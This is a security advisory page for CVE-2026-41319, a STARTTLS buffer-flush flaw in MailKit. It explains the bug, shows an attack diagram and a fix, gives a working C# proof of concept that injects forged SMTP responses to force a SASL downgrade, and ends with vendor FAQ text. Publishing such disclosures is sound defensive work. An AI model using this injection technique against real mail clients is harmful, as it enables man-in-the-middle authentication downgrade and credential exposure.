Summary
A STARTTLS Response Injection vulnerability in MailKit allows a Man-in-the-Middle attacker to inject arbitrary protocol responses across the plaintext-to-TLS trust boundary, enabling SASL authentication mechanism downgrade (e.g., forcing PLAIN instead of SCRAM-SHA-256). The internal read buffer in SmtpStream, ImapStream, and Pop3Stream is not flushed when the underlying stream is replaced with SslStream during STARTTLS upgrade, causing pre-TLS attacker-injected data to be processed as trusted post-TLS responses. This is the same vulnerability class as CVE-2021-23993 (Thunderbird), CVE-2021-33515 (Dovecot), and CVE-2011-0411 (Postfix).
Details
The Stream property in SmtpStream (line 84-86), ImapStream, and Pop3Stream is a simple auto-property with no buffer reset:
public Stream Stream {
get; internal set; // ← No buffer reset on set!
}
During the STARTTLS upgrade in SmtpClient.cs (lines 1372-1389):
// Reads STARTTLS response, "220 Ready" consumed, any extra data stays in buffer
response = Stream.SendCommand("STARTTLS\r\n", cancellationToken);
// Swaps to TLS, buffer NOT flushed!
var tls = new SslStream(stream, false, ValidateRemoteCertificate);
Stream.Stream = tls;
SslHandshake(tls, host, cancellationToken);
// Reads EHLO response, processes INJECTED pre-TLS data from buffer first!
Ehlo(true, cancellationToken);
A MitM appends extra data after the "220 Ready\r\n" STARTTLS response. Both arrive in one TCP read into SmtpStream's 4096-byte internal buffer. ReadResponse() parses "220 Ready" and stops, the injected data remains at inputIndex. After Stream.Stream = tls, the buffer is not cleared. When Ehlo() calls ReadResponse(), it checks inputIndex == inputEnd, this is FALSE (injected data exists), so it processes the buffered pre-TLS data without reading from the new TLS stream.
The same pattern exists in ImapClient.cs (lines 1485-1509) and Pop3Client.cs.
Attack flow:
Client MitM Real Server
|--- STARTTLS ---------->|--- STARTTLS ----------->|
| |<-- 220 Ready -----------|
|<-- "220 Ready\r\n"-----| |
| "250-evil\r\n" | ← INJECTED |
| "250 AUTH PLAIN\r\n" | ← INJECTED |
| "250 OK\r\n" | ← INJECTED |
|===== TLS HANDSHAKE ====|==== PASSES THROUGH =====|
|--- EHLO (over TLS) --->| |
| Reads from BUFFER: | |
| "250 AUTH PLAIN" | ← PRE-TLS DATA |
| PROCESSED AS POST-TLS! | |
Suggested fix: Reset buffer indices when the stream is replaced:
internal set { stream = value; inputIndex = inputEnd; }
PoC
Self-contained C# PoC, creates a fake SMTP server that injects a crafted EHLO response into the STARTTLS reply:
using System; using System.Net; using System.Net.Security; using System.Net.Sockets;
using System.Security.Cryptography; using System.Security.Cryptography.X509Certificates;
using System.Text; using System.Threading; using System.Threading.Tasks;
using MailKit.Net.Smtp; using MailKit.Security;
class PoC {
static void Main() {
using var rsa = RSA.Create(2048);
var req = new CertificateRequest("CN=test", rsa, HashAlgorithmName.SHA256, RSASignaturePadding.Pkcs1);
var cert = new X509Certificate2(req.CreateSelfSigned(
DateTimeOffset.UtcNow.AddDays(-1), DateTimeOffset.UtcNow.AddDays(365)).Export(X509ContentType.Pfx));
var listener = new TcpListener(IPAddress.Loopback, 0);
listener.Start();
int port = ((IPEndPoint)listener.LocalEndpoint).Port;
Task.Run(() => {
using var tcp = listener.AcceptTcpClient();
var s = tcp.GetStream();
Send(s, "220 evil.example.com ESMTP\r\n");
Read(s);
Send(s, "250-evil.example.com\r\n250-STARTTLS\r\n250-AUTH SCRAM-SHA-256\r\n250 OK\r\n");
Read(s);
// ATTACK: inject fake EHLO response after "220 Ready"
Send(s, "220 Ready\r\n250-evil.example.com\r\n250-AUTH PLAIN LOGIN\r\n250 OK\r\n");
var ssl = new SslStream(s, false);
ssl.AuthenticateAsServer(cert, false, false);
ReadSsl(ssl);
SendSsl(ssl, "250-evil.example.com\r\n250-AUTH SCRAM-SHA-256\r\n250 OK\r\n");
Thread.Sleep(2000);
});
using var client = new SmtpClient();
client.ServerCertificateValidationCallback = (a, b, c, d) => true;
client.Connect("127.0.0.1", port, SecureSocketOptions.StartTls);
Console.WriteLine($"Auth mechanisms: {string.Join(", ", client.AuthenticationMechanisms)}");
// OUTPUT: "Auth mechanisms: PLAIN, LOGIN"
// Server advertised SCRAM-SHA-256, DOWNGRADE CONFIRMED
client.Disconnect(false); listener.Stop();
}
static void Send(NetworkStream s, string d) { s.Write(Encoding.ASCII.GetBytes(d)); s.Flush(); }
static string Read(NetworkStream s) { var b = new byte[4096]; return Encoding.ASCII.GetString(b, 0, s.Read(b)); }
static void SendSsl(SslStream s, string d) { s.Write(Encoding.ASCII.GetBytes(d)); s.Flush(); }
static string ReadSsl(SslStream s) { var b = new byte[4096]; return Encoding.ASCII.GetString(b, 0, s.Read(b)); }
}
Result against MailKit 4.12.0:
Auth mechanisms: PLAIN, LOGIN
(Real server advertised SCRAM-SHA-256, SASL mechanism DOWNGRADE achieved)
Impact
Any application using MailKit with SecureSocketOptions.StartTls or StartTlsWhenAvailable (the default) is vulnerable. A network Man-in-the-Middle attacker can inject arbitrary SMTP/IMAP/POP3 responses that cross the plaintext-to-TLS trust boundary, enabling SASL authentication mechanism downgrade and capability manipulation. All three protocols (SMTP, IMAP, POP3) share the same vulnerable pattern. All MailKit versions through 4.12.0 are affected.
CVE-2026-41319 has a CVSS score of 6.5 (Medium). The vector is network-reachable, no privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (4.16.0); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-41319? CVE-2026-41319 is a medium-severity security vulnerability in MailKit (nuget), affecting versions < 4.16.0. It is fixed in 4.16.0.
- How severe is CVE-2026-41319? CVE-2026-41319 has a CVSS score of 6.5 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of MailKit are affected by CVE-2026-41319? MailKit (nuget) versions < 4.16.0 is affected.
- Is there a fix for CVE-2026-41319? Yes. CVE-2026-41319 is fixed in 4.16.0. Upgrade to this version or later.
- Is CVE-2026-41319 exploitable, and should I be worried? Whether CVE-2026-41319 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-41319 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-41319? Upgrade
MailKitto 4.16.0 or later.